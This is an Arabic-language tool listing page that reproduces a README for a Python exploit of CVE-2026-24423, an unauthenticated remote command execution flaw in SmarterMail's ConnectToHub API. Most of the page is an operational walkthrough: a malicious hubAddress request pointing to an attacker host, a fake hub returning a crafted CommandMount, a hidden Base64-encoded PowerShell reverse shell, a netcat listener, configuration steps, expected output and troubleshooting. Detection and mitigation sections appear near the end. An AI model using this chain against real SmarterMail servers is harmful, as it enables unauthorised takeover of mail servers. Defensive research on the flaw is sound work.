Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
SmarterMail-CVE-2026-24423 — استغلال لثغرة CVE-2026-24423 — ثغرة حرجة في تنفيذ الأوامر عن بُعد (RCE) دون مصادقة في واجهة برمجة التطبيقات ConnectToHub الخاصة بـ SmarterMail. تؤثر على جميع الإصدارات السابقة للبناء 9511. | Kitploit
أدوات/GitHubGitHub/cyberalp0/smartermail-cve-2026-24423
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالفريق الأحمرأداة الوصول عن بعد
GitHubcyberalp0/smartermail-cve-2026-24423

SmarterMail-CVE-2026-24423

استغلال لثغرة CVE-2026-24423 — ثغرة حرجة في تنفيذ الأوامر عن بُعد (RCE) دون مصادقة في واجهة برمجة التطبيقات ConnectToHub الخاصة بـ SmarterMail. تؤثر على جميع الإصدارات السابقة للبناء 9511.

عرض المستودع
منذ 17س 2دلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

SmarterMail ConnectToHub RCE

استغلال مبني على Python لثغرة CVE-2026-24423، وهي ثغرة تنفيذ أوامر عن بُعد غير مصادق عليها في وظيفة ConnectToHub الخاصة بـ SmarterTools SmarterMail.

الاستخدام المقصود: اختبارات الأمان المصرح بها، ومسابقات CTF، ومختبرات Hack The Box، وبيئات البحث الخاضعة للتحكم فقط.


جدول المحتويات

  • نظرة عامة
  • تفاصيل CVE
  • الإصدارات المتأثرة
  • وصف الثغرة
  • التفاصيل الفنية
  • مسار الاستغلال
  • المتطلبات
  • الإعداد
  • الاستخدام
  • المخرجات المتوقعة
  • استكشاف الأخطاء وإصلاحها
  • لقطات الشاشة
  • هيكل المشروع
  • التخفيف
  • المراجع
  • إخلاء المسؤولية

نظرة عامة

CVE-2026-24423 هي ثغرة تنفيذ أوامر عن بُعد غير مصادق عليها تؤثر على SmarterTools SmarterMail.

توجد الثغرة في وظيفة ConnectToHub. يمكن لمهاجم غير مصادق عليه توفير خبيث، مما يتسبب في قيام خادم SmarterMail بتقديم طلب HTTP إلى خادم يتحكم فيه المهاجم.

hubAddress

يستجيب الخادم الخبيث باستجابة setup-initial-connection مصممة بعناية تحتوي على قيمة SystemMount.CommandMount خاضعة للتحكم.

تقوم نسخة SmarterMail المتأثرة بعد ذلك بمعالجة هذه القيمة كأمر لنظام التشغيل، مما يسمح بتنفيذ أوامر عشوائية في سياق أمان خدمة SmarterMail.

تم منح الثغرة درجة CVSS 4.0 تبلغ 9.3 (حرجة) وتصنف ضمن CWE-306: غياب المصادقة لوظيفة حرجة.


تفاصيل CVE

الحقلالقيمة
CVECVE-2026-24423
البائعSmarterTools
المنتجSmarterMail
الثغرةتنفيذ أوامر عن بُعد غير مصادق عليه
CWECWE-306
CVSS v4.09.3 حرجة
CVSS v3.19.8 حرجة
ناقل الهجومالشبكة
المصادقةلا شيء
تفاعل المستخدملا شيء
التعقيدمنخفض
تاريخ النشر23 يناير 2026
الإصدار المُصلَح9511

يصف السجل الرسمي لـ CVE المشكلة بأنها تنفيذ أوامر عن بُعد غير مصادق عليه عبر طريقة API الخاصة بـ ConnectToHub.


الإصدارات المتأثرة

إصدارات SmarterMail قبل Build 9511 متأثرة.

يحدد سجل CVE النطاق المتأثر على النحو التالي:

root@kitploit:~
SmarterMail < 100.0.9511

الإصدار 9511، الذي صدر في 15 يناير 2026، يحتوي على إصلاح البائع.

المتأثرة

root@kitploit:~
< 100.0.9511

المُصلَحة

root@kitploit:~
>= 100.0.9511

تحقق دائمًا من الإصدار المثبت بدقة قبل محاولة إعادة إنتاج الثغرة.


وصف الثغرة

يتم كشف الوظيفة المتأثرة من خلال واجهة برمجة تطبيقات إدارة النظام في SmarterMail.

العملية ذات الصلة هي:

root@kitploit:~
/api/v1/settings/sysadmin/connect-to-hub

تقبل نقطة النهاية معامل hubAddress.

من الناحية المفاهيمية، يمكن للمهاجم تقديم:

root@kitploit:~
{
    "hubAddress": "http://ATTACKER_IP:8081",
    "oneTimePassword": "temporary-value",
    "nodeName": "DC"
}

يقوم SmarterMail بعد ذلك بالاتصال بعنوان المحور المقدم ويطلب:

root@kitploit:~
/web/api/node-management/setup-initial-connection

يستجيب الخادم الخاضع لسيطرة المهاجم بـ JSON يحتوي على كائن SystemMount خبيث.

الخاصية المهمة هي:

root@kitploit:~
"SystemMount": {
    "Enabled": true,
    "ReadOnly": false,
    "MountPath": "...",
    "CommandMount": "..."
}

يتم استخدام قيمة CommandMount لاحقًا بواسطة التطبيق المتأثر كأمر لنظام التشغيل.

يسمح هذا للمهاجم بالانتقال من:

root@kitploit:~
طلب HTTP غير مصادق عليه

إلى:

root@kitploit:~
تنفيذ أوامر عن بُعد

يؤكد التحليل الفني لـ VulnCheck أن hubAddress الخاضع لسيطرة المهاجم يتسبب في قيام SmarterMail بطلب نقطة نهاية setup-initial-connection الخاصة بالمهاجم وأن CommandMount المُعاد يمكن أن يوفر تنفيذ أوامر عشوائي.


التفاصيل الفنية

يتكون الاستغلال من مكونين:

1. محور SmarterMail وهمي

يستمع خادم Python إلى:

root@kitploit:~
POST /web/api/node-management/setup-initial-connection

ويُرجع استجابة JSON مصممة بعناية تحتوي على SystemMount.CommandMount الخبيث.

2. مستمع الصدفة العكسية

يستقبل مستمع TCP منفصل الاتصال الذي بدأه الأمر المنفذ على الهدف.

يستخدم هذا الاستغلال عمدًا منفذين منفصلين.

root@kitploit:~
8081
└── محور SmarterMail الوهمي

4455
└── مستمع الصدفة العكسية

مسار الاستغلال

root@kitploit:~
flowchart LR

    A[المهاجم<br/>10.10.14.50]

    H[محور SmarterMail الوهمي<br/>TCP/8081]

    T[هدف SmarterMail<br/>10.129.57.86]

    C[CommandMount<br/>تنفيذ الأوامر]

    P[PowerShell]

    L[مستمع الصدفة العكسية<br/>TCP/4455]

    A -->|تشغيل ConnectToHub| T
    T -->|HTTP POST| H
    H -->|JSON خبيث| T
    T -->|CommandMount| C
    C --> P
    P -->|TCP عكسي| L
    L --> A

الاتصال 1 — المحور الوهمي

root@kitploit:~
الهدف
   |
   | HTTP
   v
10.10.14.50:8081

الاتصال 2 — الصدفة العكسية

root@kitploit:~
الهدف
   |
   | TCP
   v
10.10.14.50:4455

تخدم هذه المنافذ أغراضًا مختلفة ولا ينبغي الخلط بينها.


المتطلبات

  • Python 3
  • جهاز مهاجم يعمل بنظام Linux
  • شبكة VPN الخاصة بـ Hack The Box أو شبكة مصرح بها مكافئة
  • اتصال شبكة من الهدف إلى المهاجم
  • Netcat
  • تثبيت SmarterMail متأثر

يستخدم الاستغلال وحدات مكتبة Python القياسية فقط:

root@kitploit:~
http.server
json
base64

لا توجد حزم Python خارجية مطلوبة.


الإعداد

قم بتحرير المتغيرات التالية:

root@kitploit:~
LHOST = "10.10.14.50"
LPORT = 4455
HUB_PORT = 8081

لبيئة HTB المثال:

root@kitploit:~
LHOST     = 10.10.14.50
LPORT     = 4455
HUB_PORT  = 8081

LHOST

LHOST هو عنوان IP الخاص بالمهاجم الذي يمكن للهدف الوصول إليه.

بالنسبة لـ Hack The Box، عادةً ما يكون هذا هو IP المعين لواجهة VPN الخاصة بـ HTB:

root@kitploit:~
ip addr show tun0

مثال:

root@kitploit:~
tun0:
    inet 10.10.14.50

لذلك:

root@kitploit:~
LHOST = "10.10.14.50"

LPORT

LPORT هو منفذ TCP الذي يستخدمه المهاجم لاستقبال الاتصال العكسي.

مثال:

root@kitploit:~
LPORT = 4455

HUB_PORT

HUB_PORT هو منفذ HTTP الذي يستخدمه محور SmarterMail الخبيث.

مثال:

root@kitploit:~
HUB_PORT = 8081

الاستخدام

1. استنساخ المستودع

root@kitploit:~
git clone https://github.com/<username>/<repository>.git
cd <repository>

2. إعداد الاستغلال

قم بتحرير:

root@kitploit:~
nano exploit.py

اضبط:

root@kitploit:~
LHOST = "10.10.14.50"
LPORT = 4455
HUB_PORT = 8081

3. تشغيل مستمع الصدفة العكسية

افتح طرفية:

root@kitploit:~
nc -lvnp 4455

المتوقع:

root@kitploit:~
Listening on 0.0.0.0 4455

أبقِ هذه الطرفية مفتوحة.


4. تشغيل المحور الخبيث

افتح طرفية ثانية:

root@kitploit:~
python3 exploit.py

إذا كان ربط المنفذ المحدد يتطلب صلاحيات مرتفعة:

root@kitploit:~
sudo python3 exploit.py

المخرجات المتوقعة:

root@kitploit:~
============================================================
 SmarterMail fake hub
============================================================
[+] LHOST:      10.10.14.50
[+] LPORT:      4455
[+] HUB:        10.10.14.50:8081

[+] Waiting for SmarterMail...
============================================================

5. تشغيل ConnectToHub

أرسل الطلب المناسب إلى نسخة SmarterMail المتأثرة.

يجب أن يشير hubAddress المقدم إلى خادم HTTP الخبيث:

root@kitploit:~
{
    "hubAddress": "http://10.10.14.50:8081",
    "oneTimePassword": "tempst",
    "nodeName": "DC"
}

القيمة المهمة هي:

root@kitploit:~
http://10.10.14.50:8081

لا تستخدم منفذ الصدفة العكسية كمنفذ للمحور.


ملخص إعداد المنافذ

الغرضIPالمنفذ
VPN المهاجم10.10.14.50—
محور SmarterMail الوهمي10.10.14.508081
الصدفة العكسية10.10.14.504455
هدف HTB10.129.57.86—

التدفق الناتج هو:

root@kitploit:~
hubAddress
    ↓
10.10.14.50:8081
    ↓
CommandMount الخبيث
    ↓
PowerShell
    ↓
10.10.14.50:4455

ترميز الحمولة

يقوم الاستغلال بإنشاء حمولة PowerShell ديناميكيًا.

تتوقع معلمة -EncodedCommand في PowerShell أن يتم ترميز الأمر باستخدام UTF-16LE قبل ترميز Base64.

يقوم السكربت بتنفيذ:

root@kitploit:~
encoded = base64.b64encode(
    PS.encode("utf-16le")
).decode()

يتم تنظيم الأمر النهائي على النحو التالي:

root@kitploit:~
powershell.exe -NoProfile -NonInteractive -WindowStyle Hidden -EncodedCommand <BASE64>

يتجنب هذا الترميز اليدوي للحمولة ويمنع أخطاء ترميز UTF-8/UTF-16LE الشائعة.


المخرجات المتوقعة

عندما يصل الهدف إلى المحور الخبيث:

root@kitploit:~
[+] Received SmarterMail connection
[+] Path: /web/api/node-management/setup-initial-connection
[+] Body: ...
[+] Sending CommandMount payload
[+] Reverse shell -> 10.10.14.50:4455

يجب أن يستقبل مستمع الصدفة العكسية اتصالًا بعد ذلك:

root@kitploit:~
Connection received on 10.129.57.86 XXXXX

بمجرد الاتصال، يمكن إجراء تحقق أساسي:

root@kitploit:~
whoami
root@kitploit:~
hostname

استكشاف الأخطاء وإصلاحها

المحور الوهمي لا يستقبل أي اتصال

تحقق من أن الخادم يستمع:

root@kitploit:~
ss -lntp | grep 8081

تحقق من عنوان VPN:

root@kitploit:~
ip addr show tun0

تأكد من أن LHOST يطابق العنوان الذي يمكن الوصول إليه من الهدف.


المحور الوهمي يستقبل HTTP 200 ولكن لا توجد صدفة

يعني نجاح طلب HTTP أن المرحلة الأولى تعمل:

root@kitploit:~
الهدف
  |
  | HTTP
  v
المحور الوهمي :8081

لا يعني ذلك بالضرورة نجاح المرحلة الثانية.

تحقق من:

root@kitploit:~
ss -lntp | grep 4455

تأكد من تشغيل Netcat قبل تشغيل الاستغلال.

تحقق أيضًا من:

root@kitploit:~
LHOST = عنوان IP للمهاجم يمكن للهدف الوصول إليه
LPORT = منفذ المستمع

يستقبل Netcat طلب HTTP بدلاً من الصدفة

إذا رأيت:

root@kitploit:~
POST /web/api/node-management/setup-initial-connection

داخل Netcat، فهذا يعني أنك وجهت hubAddress إلى مستمع الصدفة العكسية.

غير صحيح:

root@kitploit:~
hubAddress = http://10.10.14.50:4455

صحيح:

root@kitploit:~
hubAddress = http://10.10.14.50:8081

يجب أن يظل المنفذان منفصلين.


استجابة HTTP 400

يمكن أن تحدث استجابة 400 عندما لا يُرجع المحور الوهمي البنية المتوقعة من SmarterMail.

تحقق من أن الاستجابة تحتوي على:

root@kitploit:~
"SystemMount": {
    "Enabled": true,
    "ReadOnly": false,
    "MountPath": "...",
    "CommandMount": "..."
}

تأكد أيضًا من أن المسار المطلوب هو بالضبط:

root@kitploit:~
/web/api/node-management/setup-initial-connection

يحدد التحليل العام للثغرة هذه النقطة الطرفية كجزء من تدفق ConnectToHub المتأثر.


لقطات الشاشة

أضف لقطات شاشة من مختبر HTB هنا.

1. استكشاف الهدف

مثال:

root@kitploit:~
![Nmap Enumeration](https://raw.githubusercontent.com/cyberalp0/smartermail-cve-2026-24423/HEAD/screenshots/nmap.png)

لقطة شاشة مقترحة:

  • نتائج Nmap
  • خدمة/إصدار SmarterMail
  • المنفذ المكشوف ذو الصلة

2. المحور الخبيث

root@kitploit:~
![Fake Hub](https://raw.githubusercontent.com/cyberalp0/smartermail-cve-2026-24423/HEAD/screenshots/fake-hub.png)

أظهر:

root@kitploit:~
[+] Received SmarterMail connection
[+] Sending CommandMount payload

3. تشغيل الاستغلال

root@kitploit:~
![Burp Request](https://raw.githubusercontent.com/cyberalp0/smartermail-cve-2026-24423/HEAD/screenshots/burp-request.png)

أظهر الطلب الذي يحتوي على:

root@kitploit:~
{
    "hubAddress": "http://10.10.14.50:8081"
}

4. الصدفة العكسية

root@kitploit:~
![Reverse Shell](https://raw.githubusercontent.com/cyberalp0/smartermail-cve-2026-24423/HEAD/screenshots/reverse-shell.png)

أظهر:

root@kitploit:~
Connection received on 10.129.57.86

وموجه الأوامر الناتج.


هيكل المشروع

root@kitploit:~
smartermail-rce/
│
├── exploit.py
├── README.md
│
└── screenshots/
    ├── nmap.png
    ├── burp-request.png
    ├── fake-hub.png
    └── reverse-shell.png

الاكتشاف

تشمل المؤشرات المحتملة للاستغلال طلبات غير متوقعة إلى:

root@kitploit:~
/api/v1/settings/sysadmin/connect-to-hub

واتصالات صادرة من خادم SmarterMail إلى مضيفي HTTP غير معروفين سابقًا.

يجب على المسؤولين أيضًا مراجعة سجلات التطبيق و IIS/الوكيل العكسي وسجلات الشبكة بحثًا عن نشاط ConnectToHub مشبوه.

تم إدراج CVE-2026-24423 في كتالوج الثغرات المعروفة المستغلة لدى CISA، مما يشير إلى أنه تم رصد استغلال خارج بيئات المختبرات.


التخفيف

الإجراء العلاجي الأساسي هو ترقية SmarterMail إلى Build 9511 أو أحدث. عالج إصدار البائع الصادر في 15 يناير 2026 الثغرة.

حيثما لا يكون التصحيح الفوري ممكنًا، يجب على المؤسسات أيضًا النظر في:

  • تقييد الوصول إلى واجهات برمجة تطبيقات إدارة SmarterMail.
  • منع الوصول الخارجي غير الضروري إلى نقاط نهاية الإدارة.
  • تطبيق تقسيم الشبكة.
  • مراقبة الاتصالات الصادرة من خادم SmarterMail.
  • مراجعة السجلات التاريخية بحثًا عن طلبات ConnectToHub المشبوهة.
  • التحقيق في تنفيذ الأوامر غير المتوقع بواسطة حساب خدمة SmarterMail.

المراجع

  • سجل CVE: CVE-2026-24423
  • VulnCheck: SmarterMail ConnectToHub Unauthenticated RCE
  • CODE WHITE: قائمة الثغرات العامة
  • ملاحظات إصدار SmarterTools SmarterMail
  • كتالوج الثغرات المعروفة المستغلة لدى CISA

إخلاء المسؤولية

تم توفير هذا المشروع لأغراض البحث الأمني المصرح به والتعليم فقط.

لا تستخدم هذا الاستغلال ضد أنظمة لا تملكها أو ليس لديك إذن صريح لاختبارها.

لا يتحمل المؤلف أي مسؤولية عن سوء الاستخدام أو الضرر أو فقدان البيانات أو الوصول غير المصرح به أو أي عواقب أخرى ناتجة عن استخدام هذا البرنامج.

استخدم فقط في بيئات خاضعة للتحكم مثل:

  • Hack The Box
  • مسابقات Capture-the-Flag
  • المختبرات الشخصية
  • اختبارات الاختراق المصرح بها
  • بيئات البحث الأمني

الاعتمادات

نُسبت CVE-2026-24423 إلى:

  • Sina Kheirkhah
  • Piotr Bazydlo
  • Markus Wulftange
  • Cale Black

تم نشر CVE بواسطة VulnCheck في 23 يناير 2026.

تنزيل الأداة